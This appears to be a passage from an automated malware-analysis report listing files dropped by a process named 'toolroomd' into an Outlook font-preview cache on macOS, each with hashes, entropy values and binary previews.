MD5:	DC75936CD8D60FD551657548839CC07D
SHA1:	69AA7426EF29EE838AD19635E490128B55601E37
SHA-256:	A187979516B0522B8B3D488F95D6E2C2893F59CA189E9F1067A89390A5B80FBE
SHA-512:	56F84807DB80D75A0B5CAC03EF1299EBFB8B795DA6DB4387FE6A353AA34BE61E5677A5DDC92A72EF939BE6362A746CCEBCFE5EC2CAA8D2573FF83511E7E64901
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.D..BL!.K.t.5.._p-.u.......R..K..,z..Ioh7T.....4.h....?3D..Z...K.)`..V,.c.{$.3.....B(l..<....v...?Quw..f...@..i.#Y'za.(V..p.B[.zY9.1/.7.z[...H-.x^J..Id'..-.2yW<n8.;...AiPH...[qt.h7..37.v.u.m._-...B.,..P3.?n..l....=!.~'....P...-.@k..4........e.....U..C......._...u.r^.....M.^...{t.DJ....{4P.u.'..NI....V"....9%...aPyy...k.S.`.qcCy."wV.-.c!k....ZTS.r8..{.?n..+..K..N.jb...hG2..k.l8..!j....e.9...\...p..k....l....{..g...L}.f.R.....i...4L.I..5ey..b=.Z..Z...j`.%.:...^Y.)..}y7.....=...G.\|,....\|..?L..1.9S:....}p.t.'zR6.....0..G....k..=.....s.;\..l.[.Rb.h.....I..6...>..(..2V.......Y.U.x{._.......)...R].C`...8..........g>.r..M..&IFh...h.......DM.c{...<l...!+(.:@....@....#.Mp.X....V..I...QL..].I..>..q'.KV.,.J....D$A...J..B........\......e..6..c%.C......]o3.N...J.\-...m.L.a.q.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Marker FeltThin.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1370
Entropy (8bit):	7.436910519967625
Encrypted:	false
SSDEEP:	24:E/Z/vVpoQg3+y/nt1dunGA4/JPOTSSxNnPZVcbk2jrieBB6pNqpkNsePc0m7:ExVp1It1dunGA4BPOTl3kVvBopNnNNpq
MD5:	4694676CBD32148D9914296486C4E5F9
SHA1:	76B8E1678A99C1E112DE7EED45D464262B939180
SHA-256:	3FF430CD41BD5D8123DF5F2BB638AC5F78186031B2FE17DFAFF521FBDBFC7014
SHA-512:	B0B42B96CA6B5254946DC7A1B865BB2DCB259479DD582597902177405E66BE0425D452BBD712CC7B0C9786470925499771E67614275A7D8FA8571B3FDF8F7591
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..kl...!Rrc>X.^.U@..5c2q>......O..x.U:9.....D..W.."f2.7,..W......:..N..=....T...G..T$.[.lH......3..........%..<....qP.#........h.....On..s.P:.T.B.X.&.~...$...qaEa.)Z.7$.......s!...N,..z.......K....;........#..QY.4.ly...9...+.:..l.o....l.pq{{%.....u.4...N..5y..el..l..`......p{c..E......K.#<.h....0...h..GFeD%jN.s.~......]^O...B=J.b...e.c..)t......ftXm.......j.h.n`.:.z?+%.}.l.9@.:W1.N..d.9...S.e.v;A.....1..=.-....[.~3...~[.... ..VZ..b.^..=.H.{.?.............v....9%.\3....!.UG)2o....nB.~.b.,..};..$..r.1..c.l..E...X.. ..>.3...zJ....S3...I.E..q.\.......9.:x.....x..L.T.....Tn.+^..d..Dl..7\|Q..#. .7..m.W..;..../..Z4d...b'.}....b...t...A..........b@......>za.^+...c!..L...`.:..I.$2....my.K..@.J...`...DM.6[...2..;..J....x..`W.;.>.]........\..t..(..g2N..x.a.lc.Z.p'...........'.S.9...u.jc.41...q......bqX.}...oM..t.S.#.V.a...Q..R.#E..C...z..p.7........Bs.B.xa%[.^..E{.nu..I..%."K.Nd.6..F.U.V.m...5.;.........

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Meiryo UIRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	7.433729949451717
Encrypted:	false
SSDEEP:	24:ExVA+G5CnrFDFiDOZKlit+NM/YLRtIkeOsePc0m7:EHA+HnrFpiKZKsCM/pkRNpq
MD5:	C05707507E267C8764ECD2BEED6CC42B
SHA1:	F71A09211471EC730C8C1297D5A2D077525EA1F5
SHA-256:	3400BB8A01774778013F7E547D3EB4F417F62A2F968D210AF4531BD8292B0599
SHA-512:	754B0E7DF92FE1BE52516A7605516737834D75783DC5EF41286828F0AB508FAB04B9B04FED21F4F6CD122BC789676BC2CB9068832CED7488B5277447A2B4C0CD
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.v......~l.......-?.!........"...W.$6.cn1v.6~..u....D...[.[(p.Fh;.F}..uxK.l.Kc..(h..#-~.H....q.....S.@..yj.+..{k.Z.........>...!..~.:+0]I.M-....Q...[.D..."F.a... Yp..3ef.H..o.]:4f-...>.9.M3.G..ZR8d.V.....\|.k~D.^.G..............r#..".g3..`%f....Y2; 3.........T0..R-j.."\|..f.(....}..!..z.Yw...+..........r.5.L....E.7......,"...T.G.P.........F...4;.G.m._.rb..`.K..8...g...J...SnA..:......#.SG........j........:.>h.3.7....0Q..T5.{~4."..FE..;..6.L....N!.U.zd......^./..7"0...K7.in.f..,.Lr....+.Q.`P$.u.().\|....[..).7..(h.........l..;..S..s."<j..q. .-.R...y)..w.N).R.....1)...y..fZ..T..U.N&...6,/..6..4..Z.nz....~\|k{...!..k..F.~E.E...9....U.$.]).....s%+.b)m.......y'.Wo.u..vY.U.ST.....kr]UO....5............P3e..P ........T.....2Q(m.#.w>.8b...o.N..Kw@t=..&.m.T.D..5.......*n.I....y.]......\|..HM..[(@e...!\|_N....]z&....'..4V..}...5J.-...ipM......[..........:\.0v........X.)..T...;..M...C...D

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MeiryoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1170
Entropy (8bit):	7.296752188446938
Encrypted:	false
SSDEEP:	24:9ApLRsfwX4KZTu3tv05ok7kG54Vk0bRouzjzsePc0m7:9+yMv14tv05nIbRou7Npq
MD5:	F900F8FA02440DD17A47DDF661585BFA
SHA1:	CA57770372A1E9E31A9C5327145443E801408000
SHA-256:	E2CA1A6DB8B7FDD95EC782D11AEBF522B0CB99CFC1885A41BA72FF21B8A721FA
SHA-512:	37CE342167231320A927E2A2A8D0F74217506D14B65726901DDFE96CC63F21D2991B187BC20478A794526BEB553F6D08E5269B169D496D22BAAD7E5EFDBF21B3
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.ah..BM.....U.'P\1..x.../...1..a..vE5....,F\.L......9....;..%...T7..(Q7K/.3(X\|......:wxaw6s...m.#n...izBPWy......+W..#.Q.....(E......}7<.\..?G.g......KQ..X.b1.7....MS...f..+.\1..j.8...gIObs<...bH.........F.wL..i0...:C.... ..............1.....].\|n\|.........:9d( ..HNt.,:......1W..#Xl..v....-.....c..u.@....3...5.r .B..]..p..........>.t.+.,..9....r.{..k2.PF....w..&b.}.....p.-.(.q.A.7.2.x....]II~n0'.R...:..........z...YV!]w..X..(...N..........._E.....}..!E.{.g...4........A.......HWl......._..i.i.....^.}..N~.v\|...So.ie.....1..Mf..t.].g.j.'.`._6.7..qD.............YC.q.Q..@..@.C...ni:.R....u.....]......:......f....h3.....E.0.mdl.D...F.....w5R.+I.E.4.U..tQY:Z....._7.&H...s..A<.3.E.D-V...e0...l?6p./...%g.X#.u.....r2...Rl.z.@`.=Ii....x..{4.p.Osz....J..`...Mk......f,e..T356A^....'.n9HY.a.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MenloRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1058
Entropy (8bit):	7.235202718000555
Encrypted:	false
SSDEEP:	24:EET7xERFGH79aM5oARso3iC/Sv1XgMThvE1isePc0m7:EGaFchaMGA6o3iC/YNvzNpq
MD5:	AB5DD193A6ABEDA733264072E00E0C93
SHA1:	D0B9801E17EA911E90BAE2D85E920E24679AC417
SHA-256:	BB04DE886425E375E06BAFE31F144B4E1D2D30FF3610AB53A7D57B5A32576A4D
SHA-512:	61DDAC8A886BDD3476D5F6FEB7816596DBE2362F67706D1C3C6D2ECA5AD5A65EE86F696C50C6F20B580D5B8549720311DCFAD1901F6A8F6717158799E269D591
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aE.~...:m...{.(f..].U#!..N.f:......M.....#%2.v.X.6.b.@.J.a.V....ccx.0..U.....U.N..B.&.W..G..)..(a..#......~#2R-.-5=.W..A...(s._.._.~....L....Y&..V.wR.)0....7..[.......BS...+..QKw..?..O...\|.......r1I.}..6..2E...Y.A...v/._.%[w.....6.t.+@.#.?l.B9.2..nO.S.....y/."....F..Wj...]q.N.l.\|...e-...?h.B..K.P.J..lm......s.0]{E..jo.BB/.YZ....tOC.L$s.h....A.3`."....eL..%..W"%/.n.'M..\..%..N....Z.k.....y3...../......<..k......rc....1..{z....>...ud]..?{..C<]....%.8.[.F.L.pk.>.!A.E....L.......A.g:,...3W$..[..,$vP......k.KZ..F....d\|..).&.o............Z...L../5..................).Yk.xo....Z/..q.h...R;...%.l..\|.v>Ca...,..)z.>..L...Cg.L..I..\|.+g.?%o.?LY..5.K;..#I@.f[.Z7.E\.:.&H...s....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Microsoft HimalayaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2154
Entropy (8bit):	7.68825167671347
Encrypted:	false
SSDEEP:	48:EfIkKsKdMrAf+BWssIj3d/5jMZQN0bCp1JRd6Gl6JNGNpq:SjKd0Afy/j3QK0Wp1JRd6GIJUu
MD5:	3780A80A696B23A6CAD71A9153C1F840
SHA1:	E8261E346D0CA3403044AEF459F380058B13670D
SHA-256:	1AD37C1B6EB4B138420B79570DA070310625708761BF8CE27140DDCE7664E5E8
SHA-512:	EE0AE0343FEE13679D28AD967E0E28C77E548A3076FBB1C7B835C658038CCF83D0F3D588C158B294B71424BD1F5EF6E983AEAB32701A9EE73079FB769F65B145
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a\+x...'g.f..3}...Am.....=.17..cc.[..&..p.K....B...pC.T.Z...;R......,l......O.....J....\...J]..P..Y.....!..6..=....6..=..n..R"....L'd.[.-.pNI..`x.]8.R...e7DQ...-.~f.8..".;e........r..-2k_q.>..a.r.=..cI...6.[...3.{.[.....X.4.P2_;..;?$.0E....o2:.W......N.eH...MT.MOpt.....(...W]..Y.....f..X.;S..x."."g..?...r....=2E8Q.Z...u........ .'.....Xz......9.).9.i......r..LG..n.b.Xy..R.p.Hz..z..0.`..#...$A.MA. ....6O...N..]u".A.$.m?:..{G}..i..h....AD..SpL..../d.o..!.{.2.G.^}..==2........W. ..o../o.4....OA..W.... ..w.....XO.....c.....,.Z6....6tC..Xm. ..R!0..j..(4../...{..4..Cz..n.$..e.d...x.u...1g..Q.......a.....7......r!......xv+q.....:..I.....N.mP(Vu..i..5/.1T.....f.d.%..C..K\./....wDJ..........[.......[..,B.......?ag....'..........P.!.HJd..\0/.p..3.BQ.x$...J..mcF..<X.K..i...v..l....!..s8^..Y[....(g.+......,{V<..U.ahm8_.".E%l.z.._qe.f+kWo$#a=d~.=.\.U..y...:..*.1..B..o.D%...lD..B....=.`y.T..Z.i...

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Microsoft New Tai LueRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2114
Entropy (8bit):	7.6591642180928
Encrypted:	false
SSDEEP:	48:E16Qrk6Iq/cwBGapjaEKhIx3p/RKvZ3YfV+wjoeiNpq:n/WBGapWFhIx3p/Rw5WV+wcu
MD5:	8513AF8BBEC5B8822D1336FA3FC46379
SHA1:	8A17005725E80C955FE4BCC77D026B37E08F4AE6
SHA-256:	9A5D58A6B697403B3FC1755298B318A51236D4B0795B18E4F2AD72D284BFB329
SHA-512:	999E91AF228E98E4B9B0AD6D34CDB168F9DA586E3FBE8F8792406ECB732063F9975D90D9814E015F43945AF03DF29024656D45A9E5C02923D44D51CB817F8BE7
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..,M..d.x]w.qy...hl...-6.d.a......t,.ML...+gt<z..U4..MP..d..E&...jS~u..o...F..v.F=E......6......i.H.:..i.H.:..i.H.:..'.A..";.`G.E'j.{.v......]3....AjR.1'.z.:. ..\|Ap.e..=J........`.]..@..u<..a..5....rF.^KD\.....-..w6.....ix.7..n.T....4].<.$.7A-..m....5h.F..D.].._..X.....YA.a.).7.X\.......(.....$8al.ytM.ppP[.I..R.b ...o......m..K3+...4..iE.......s.8.....>...k..4k\|_....k.. ...e..!....0H...#I.yA...c0d$3'..\|i.....uZ ..X...4..] ....zm.C0.kvP.NlY@e.......'@..w....ISz.....alz...-.......^p.I..8....2.Z.........{...Hb.....@.W....l....AR...v.....1Z..,.TU../W........A3.x.].!P3....k..D.M...(..)]O...C}x.f...<.\A.w.dh.O."...Q..`...N..././/.=....W.'.oI`.`....aKc.x\...g.f#&mP...Q]....y.MX^.5..F.(.#.P.~1+.../.@.yP...`y.=.0.5..X.LQ)_....ze..t..1...[.iJ.g..DY.>.0.u.....4...J..3...~...}..f=nkI.{..zl..02...Du87..r.>.Ua.0..s.O.D..K.j.J...7..b..".) Kn*o....../.....ZZ...U\|.{YB&.Q..../x<.H#........E..a...Tx..`..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Microsoft Sans SerifRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2186
Entropy (8bit):	7.7079550260935275
Encrypted:	false
SSDEEP:	48:ENIFL6LL3Nf+45D5+Pu1GDI9kFFtw+wsNnZmB7Zy+Zqw/Npq:vmNfjV5HGEu6LqEzd/u
MD5:	353FF4144DE4558C21CD4B6753D7951C
SHA1:	85E6016E7CE4AA133AD73D21EF2CA078B66F637A
SHA-256:	807AE1F52D4FF35C556F5C75744B79290AB66836ECC86591C6097E750DCF95DA
SHA-512:	65677DFA4FC5D3FF68B33897EEACEA151E9A5AF4197ACEC809FD5D188A3317F22D4852AE57C67BDFDEB3F9584D0B77874AE802933D5ECF499B1C1295BE25BFCF
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..nh..7..8N..6F..?..=. .. .R...4..........3c......-.t....@.+.-]...==AA...90v.x)DZ..&...\|.>..b....q...0...q...0...q...0....".wEY......r...;..s...t\|.9..PP..(....U.:CJ.y..a....4.1.:O... q..]v....."M.zS....(.2 cU\|..[..[/....8...I.C.hz.C.jb.S.".....DBo.[.m).E.......\|....LW..R...;,W..m+C...3..=[....L.6.RX}a..+ ..P8.V..\|.\u.;y..U.j.,.....b....nP.T.H.d<..9l.L6....#.%Q"...k.C!.A.........Z...g.O.h.<].-.01....$.fO...F...x..8.+.=FE%.U1...V....1...9.>.>5....gP.!....T.0..S.....8.._...pxWh/..sK.:..8..+......j...P...p.!f..*...#..=....~.....QI......2......0.\Oj.'...1..k..Q..[QzL..QlN.o.k.....}^5.lQ.tx.k.."~.......3...R....N........[I.Kr.../.c.t."H...G'"G.:I.F>W`\|0{.....f.R.t.....R.~d.......{..o_..n....nA.....)Ji.o.....7.{u.............>.w..X.tD..r..1`.7C......3(F.Rim<x.......n....i......`..-.D .2;.cA.1...x..2..u.......{Km.........l..y..\.Ho.lV\|.....s....K......h...p..&c.7_r+.`\|?.~....C$.s..[..O....i.c

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Microsoft Yi BaitiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1770
Entropy (8bit):	7.5979469933391055
Encrypted:	false
SSDEEP:	48:ExfxYqJkQqpicT7Mv65fF6XVA3CvYwGcNuBYNpq:cYqJkFpicT7Mv6pEXVAygwGouqu
MD5:	48813D35790BD61B3B3934342D28678F
SHA1:	E014C1D68DDC5FFEE1920D70F1895B8AEBAD6965
SHA-256:	1F0127D58627842E0D79B138144E1B5F9B171808A400B7471289EF52A221FF9A
SHA-512:	190DF45016AD4C22CC2F79B70AD3B0A549A609181FE3AA007F8B5FC90C6E89D40A28351784D18D1A0DD6CAA34C96F717F5B4DA7F30AFAE6016DCC0D34052CD3F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...$...'.B.o...)....<JT^.....U..a>.M...pd..>{T[Gy.U.6p)........CW..a...:..0."..v.D.....v..W.4......l...[..4(nE..m.(..&....v.&....v.&....v.'.2..-..V./.=.0^..E.Xo...b.I;.%..Mt......d..].t..K.d..v6L..u~r.....\.k....B.^..(..C.ai....V.Wf.+.{kZw....v.\|..m....B.....Fx..T,....h9.Y...H..1..@..Z.@ke.O...a..".?...s\|Ks.%....^....h..O.....e.e...+.$.3.....}..g.........q..qY..G.f....r....FI..<.x.Y?Cm...Al..#.O_..m...x<)p.....'..D4s.k.(..l......).2.t.....5.,U"+3.....z.k....p^..../...RU..Q.Q7.......E...\|a.14T..h}...r\|..0.\..~bu.'....5;.x....C.".......).c...X...o...y.(.....8..Y.~.ru...'...-Z...]..U..5.z..:m..jSv[H(D..En...9..RB.}a....P..n..z5.y@N.w^....<<.......[.a....M...).MR..$.U\|.....4NS..>..i..jy...M....-./\| ...}k...[..?..j.v.9Bh.....xmp.....n.;. ..h.wx...k...4h.y.t....:.......@U\R~M..F.....[.......4.H.^v.X.K......^...>t..Z"...UG.3G.a~.].pk..AA.vPE...z.....).....d..b....*.....T>..I.p......8m..o{.H,G..\O..K.P

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MingLiU-ExtBRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1730
Entropy (8bit):	7.568786035842593
Encrypted:	false
SSDEEP:	24:EL264SXwGbg6KKOUJ08DyRqoc8jhxP2JfWuaLbbzbjdA6iC823zLt9bNnsePc0m7:EoSAX8ERqofTiflav2C8kzHhnNpq
MD5:	88B5185CFA99B89EF43730DC307DF379
SHA1:	1D2897C591A6B735EE6D6D7A414F727E81797DD1
SHA-256:	7F1E368EACCFC643D6587960E21D9F16F8DEF4B2E1A411D5D9E610F13A344F77
SHA-512:	04A4B9AABA627910F87987778ED6C346C5C6B6C382A495EEC55BE8C0F849E3E4EBE250C194396895BFBE0091B11A7D30EFF0CFDEA833AF52840AF6362A67CE91
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aG.x..o.D..l8.[.y...._(.5.......AL.2.:v...../yk....95..n....{..6_..........c..L...aY.._\|4...\.DI...I..4v#..'....a.'....a.'....a._.$9....'./..j..t..L.8..\|..3A@..<o...@R"..E..!.j.r9..Oz?Jf.k....\.bC.E..".'bvn..9...P.}.b..uzrC.K.+.i....6.G.1.]..%..82.m..Se.....}..m..n.`2...r...U.Fv....?.....I..).J?....wz.....r....;W..1...e";..\|p.px..a....E.\|....>r...%.....\|m..`.OK.L?.Ps...(.`..CL...>..V.Ra 1...jH.@..............~\........;....o..`J.5.OZ{.=G_...0'.8........."......C\|3...k....(<&.3..)G}........6.....\...\|.=...S....x....EO6jP.E...6.ji.!...Z......<BM...V.IOI."..nD<......./..v.K...A./Uy..&..../...-..F.T..TDc............a;...=t.E..!.[0E6.(..m.....)..-,....H.....dz._)..R2.a..."E..:9S..Oy.MI..!...CO~S.\|2..c%8.(nSu..pj..wD.....tEs.p.:..........v........:.....%.......qVj>&..k<.{...p.q.......p.^.T....}..u.?..mF...V...}..O.zp:...9...;.!....1.. MWS.O.U:...;mK.TR..?.C..q...A..Uf

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MingLiURegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1282
Entropy (8bit):	7.394225336505138
Encrypted:	false
SSDEEP:	24:EcROR6bRPjPiXY2NaDYuVL69YJjUMuFJkFHh+bEYbu22sePc0m7:EcwKRbUZK9Jj4qJ8AYbQNpq
MD5:	2DCAB80C4CD3C5DB76DA8B6C240154A5
SHA1:	DFF6B01DF7A33D987A11DC35AD04061CDF86E0A8
SHA-256:	DA670464C95D6B38BD2D8C1D65B0E614D84A94677CFA8A25B9A9D2DD86FAEC2F
SHA-512:	ED9FB33E98D8A25EF00C668C0DEBC80F4F2D6BEE54BA11A6303CE1C7CEF3E98B03C713A8C49741056B74A57D04C9C3A1B623A136FC73F3797E80FDF7A987E859
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a......HA1.7......q.Jz..zy.l+........a....4O.fW......SO&1..F....O.m......;.~fd..j...:/%.J...a...2...8.;....0\|...#..!SMp...>.].~../...w.h.....]....../...g...R.~g....3....2.]..C...#qr../+0..+..m......C.v.8....<c.!f...oo.X\|.......UX.KX.{...]l.{9.\....a2.\..D+.u.m.4...&.X.z.8..,)...1kx..g?.)...7K....D^.a...uC. \|....v.."+H... .<.C..... .3..n4.K.iQcF...C...._......I.I.w.u....{.E%J...M....HDx...^.f.017.........l..oyk.2:I.....O...E..(.....d7...eD..U..^..U.&n......3[...@...o..b.d.-..G..(...2;.h(.t.%...g.F^...2.....bd.iT.+.!.S5....'A.WTs.O...h.~0.l..o....[..+....2..fb...(..W}<......r-b.!...'....H.8L.,..ls;).....'M.J...Y8W..8..w..n.?.vd.C....s;....J.......n.".Z...[................O'E...../Y.oh..._...Y.$..~..e2q.:.xm..A..!.J.D?..Q#... ....uj...4.A..\|...1.)...yaltv.NrF....!?..2 .;.0..&.1Bv....Tc..&.]Y....].l...i..i.S.......p>`.s.....P..aP.(& .....L...v"x...xs.L..*-..^...&....b.>b....B....................\....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MingLiU_HKSCS-ExtBRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2378
Entropy (8bit):	7.729148662902809
Encrypted:	false
SSDEEP:	48:EwgW+hNCzHIdQD171ijXkDfUr3bCX+tEkdBqNpq:QCzSoRmXkDI+XQEkdBqu
MD5:	0D8DA59B58F939261F2CF362E0434E28
SHA1:	6F5507F089C0C8D7A7FA495B0DB1DF945A710DCE
SHA-256:	FDC29D963274940B8B91135F7FCC586FA67D1C03B2DAE1E64CECCFE70490C210
SHA-512:	1FE3FCC280ACD9E0A323DADA45A167E970F522C2CC926CA70BED028AB4D05DEB3C36A3412FF57497C654F9FD187F51D06093565F1CDCF87C4AC2ACCDDF2D93D2
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aX....v.RU.>........8v..PM.Ex/...F-wn.....CX.....X..y`........0..g..,).......a.G.E.{...u...9.._$Y...1....y.K.c..._.^...._.^...._.^.l.E..Ay..Q._&...y..;;......j;.....u@.}$u....D..&Z.<......w.To.]..._..D....8..YU.....L.y.1...J.."...!....d.r/.....~.C.....JX..[~.~...I5)k..A.T..c/....[..s5.f.GV.n._.k....~HPX.>....$1..e>]+o5...f..f....l.'.V.y.5.....?.P2....f".-Y....R...y8.).hSo...;.v.].[.\|.)j.,....H....0.<\..(.5.m..!3..;\..)..Q`...V0ku-....I...!`.....oA.........N.V..TQ.I.6x9l.H.....X.q.....T..i.=....^...Jl/....3.!.... .Q.$/.@g.=_.B..UU. .m....rg.~Z'.F4..)9b...X...n.=.5.p......]...-..N`..........-5?%.~~6.c.C)........W.v....g.J...n.L$.g.'.1<.( X..d..1..C.^.F.s.......@..`c..p......]..yR^.....)...@E.2}.v~i..p..\|GVIC.....X.4#,..h9zyK....S...(....{....t..R.4.,..=.....nU}...~8EJ../d..$cl......A...TYi.`...].....Y3E.....F....P.F=d.....G.f..j.cN.F.GM..Bh.I.c5...&.>d5....;.Hz..]...n.B.p."...L..g.+.#.....:-.S.'

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MingLiU_HKSCSRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1954
Entropy (8bit):	7.643410430430734
Encrypted:	false
SSDEEP:	48:ESoRD/GnN2mz0Y7VL+e7vg1AhpwEt0jNpq:O/6wmAY7DIAhjEu
MD5:	EA948BFF7DB23F6502447D4906038781
SHA1:	E00F4D3F6A62CB5EE64487C6880052515B965044
SHA-256:	4EBB3F901778CBADEEF45232B111C9B8CEFCCADBDCCF77540264F39E9AEE1364
SHA-512:	615CB883E464EE45FCC87B7E46BBE83E7ECF69262E1AA3E6FAF28B9F92C78D946CAF164AD2509C5572D6B0BF510BB9897BB3AFA090A61D094E812EDDA1DF7159
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a~.W.L.P.....`.]C......#.m.Ty...c.\|x&.{&..8..<P....v..3%cT.v...@..X....z...D..Z$._.0..'}x7@.t\|ov]..!w.j..je. ...EI.u....EI.u....EI.u..k../..;.8q...._}..H......g.v3r..Y.Q.f..%.Hh.@@:..@.o.]..7e...B6......U.!.gW2..u.N..0..9..;.fIz.Z,ld..F..%.HD.n.....Q..."..'QVJ.2..\|hP...%..m..#e..a.IK..&l...-v.[-;......8.B....n...\......\...B.';..rS...+...5. .X.............V.... ..zyL.R..cZ/G1..;...k..,1o..O...Z....-.k.+....&....3L0.G.5o ....._.]AW.O..r..A.L!.v.]..+x..a.'go..c@....0.w.\....)5!L..O.BDB...m...o..4...F.P:H..>..u...4f}k..(t.].0I.%.7,T...(...R.j.j.......K..fz.w.~.[.S ....fa=..e..&...uA-.$.\|wGK...J\g.\v...a}..6.uxdk...m\...V.b.._..R../HA.@.....m..<.\lj.O0@e[?.........:..!Y>Q.....k...9.h.s............. ..6..^..-.4.M.........K..g..M...o6O..=..Oe..0L~..._!xn...Tj....(....K..d.h.S... y92..x.=.rr...I3)x.m#.L...aV...fj..W...F<Z.Z6.!.f.6.z...Y..=k.C.Z.e!v?...N...9..!.+...X...I.o. .pU.5L......gV..*.Q....euNZ

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Mishafi GoldRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1642
Entropy (8bit):	7.565603731113482
Encrypted:	false
SSDEEP:	24:9AjfnwPathpaIFrx2Cnjhn1Z5Z9z3yKGqQMyCC+FmBHQaMyGgD5p/sePc0m7:9CfqmhsurZ+qfyCOZMyGgD5p/Npq
MD5:	974D06B797DE621E4088674E9EF89466
SHA1:	9830CD97DD6541434DD9ADC3AF7C977880CCB997
SHA-256:	AE43BD177004A360D0C7FBACA39772F493A871637374CC1ED92C1FAA5D6CD12E
SHA-512:	D34A8F960C81D537FF2D39AAF2392D8AE87BC932BFAC81B6A0CEA873AE414CE7FE9D590C13924271C683FA8CE317A6D571B4F57ADC790904E1121A3C4A231BA4
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.a;.?ti.:...Q_..G;k.T...,.....qn........Lp....M.i..~...$~..?.-...z..#DUZ. ....4..#s..Uo.E..7y.....-.A}k......S.X.7....#...R'R.Q.PO.6.T ...~LwO6.........}.iHz.>l7..A..l.x....]Z..;.ZG./..@.S..M..g0.y....zi+@..%......<_:o....?.....[..3q.Q.U.q..m.T~..PI.\.....:.O..^..v>-..G.[....A...I.^...A.@.....]....2.lI.5.P.....Y'..^.3..z.....7.\|<7.......].8m34..X..o%}n...#yJVPL.j9.m........d.DN.h..........J.;V(.....<.pf\|V. ...V.5.1.hGS ...R..".6.L\|...r...N!.:....2G...vM..v.9<.n..G.g...g\|M.."..6.A.#-'z...........3Qt^;.o....0.4..y.;....{.xVVR..,..D....../0...}..~i.B%.......6.T.<&1~]i\...k....m..c.....U/9.Y......b......wwox.z..:..5.~.`..Y.gV`a...!..0.................q.R<h....<r..y..W@....C...$.{.F~..u..-.C....r<W..7.:..% .....)i....xt..."........^.RK..).....@...Iu.ZpCv.a.n.{T...47R.....E..v......b...h5W..F5.\|..?.`..O.....H...=..IK.zzq>..7.G6.1l_.895...D.YV..........\|.......%..@...~...r........\|.H

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MishafiRegular.png.e Download File
